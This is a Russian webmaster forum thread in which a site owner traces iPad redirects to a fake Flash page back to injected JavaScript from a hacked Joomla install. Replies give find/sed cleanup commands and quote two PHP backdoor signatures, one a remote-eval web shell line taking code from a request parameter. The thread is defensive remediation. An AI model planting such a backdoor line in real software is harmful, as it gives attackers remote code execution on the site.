Сайт на iPad перекидывает на страницу Adobe Flash при попытке загрузить любой JS файл

116

2038

25 марта 2013, 18:25

1185

Здравствуйте, уважаемые форумчане.

При попытке открыть сайт на любом Apple устройстве сайт перекидывает на страницу загрузки Адоб Флэш. Но! На сайте совершенно точно нету никаких флэш-элементов.

Методом последовательного удаления кусков вёстки обнаружил, что сайт перекидывает на загрузку Флэша только при попытке загрузить какой-либо .js файл, например modernizr-2.6.2.min.js.

Что за парадокс, как вылечить?

Борец за чистоту Интернета.

K5

209

kgtu5

25 марта 2013, 18:31

#1

не парадокс, сайт взломан, в файлах добавлен мобильный редирект...

1

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

28

116

2038

25 марта 2013, 19:16

#2

kgtu5:
не парадокс, сайт взломан, в файлах добавлен мобильный редирект...

Угу, так и оказалось.

Причём сайт, похоже, взломан через timymce.

Переводит на некий online2you.org

Будем лечить.

28

116

2038

27 марта 2013, 19:32

#3

Вирусни оказалось даже две.

Одну удалил по точному вхождению строки, зашёл через SSH и ввёл команду

find /sitedir -name '*.js' -exec sed -i 's/textdodelete//' {} \;

Вторую этой же командой, но сделал проверку регулярным выражением по вхождению определённого текста в строку. При нахождении строка удаляется целиком

find /sitedir -name '*.js' -exec sed -i '/7kSKlBXYjNXZfhSZwF2YzVm/d' {} \;

Поиск и замена Sed JS.Siggen.192 Как помирить find, grep

K5

209

kgtu5

28 марта 2013, 02:52

#4

а теперь осталось найти причину: "чем" напостили и как это "чем" на сайте оказалось (99% оно есть и грязь повторится)...

IL

435

ivan-lev

28 марта 2013, 04:38

#5

2038:
При нахождении строка удаляется целиком

Видимо, ещё не попадались варианты, которые дописываются в уже имеющуюся строку.. после удаления которой всё поползёт..

Присоединюсь к kgtu5 - почитайте, проверьтесь..

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )

F

64

fStrange

28 марта 2013, 09:44

#6

А теперь проверить php файлы на наличие двух строк

eval(gzinflate(base64_decode('

if (isset($_REQUEST['en'])) eval(stripslashes($_REQUEST['en']));

Это источники. Судя по сигнатурам в js, только что боролся с тем же вирем.

Посмотреть дату и время создания файлов. Посмотреть в логах дырку.

Php файлы надо удалить обязательно иначе js опять заразят.

Весь алгоритм расписывал тут.

И надо обновить Джумлу и плагины. Лезет где то в дырку Джумлы.

Лечение сайтов от вирусов (http://fstrange.ru/coder/php/cure-joomla-phpshell.html) |Ремонт iPhone в Ростове (http://a-stor.ru/iphone/remont-iphone-5-v-rostove.html)

сайт на joomle стал Сайт взломан ? Яндекс нашел вирус на

Переиграть и победить: как анализировать конкурентов для продвижения сайта

Курс биткоина превысил $50 тысяч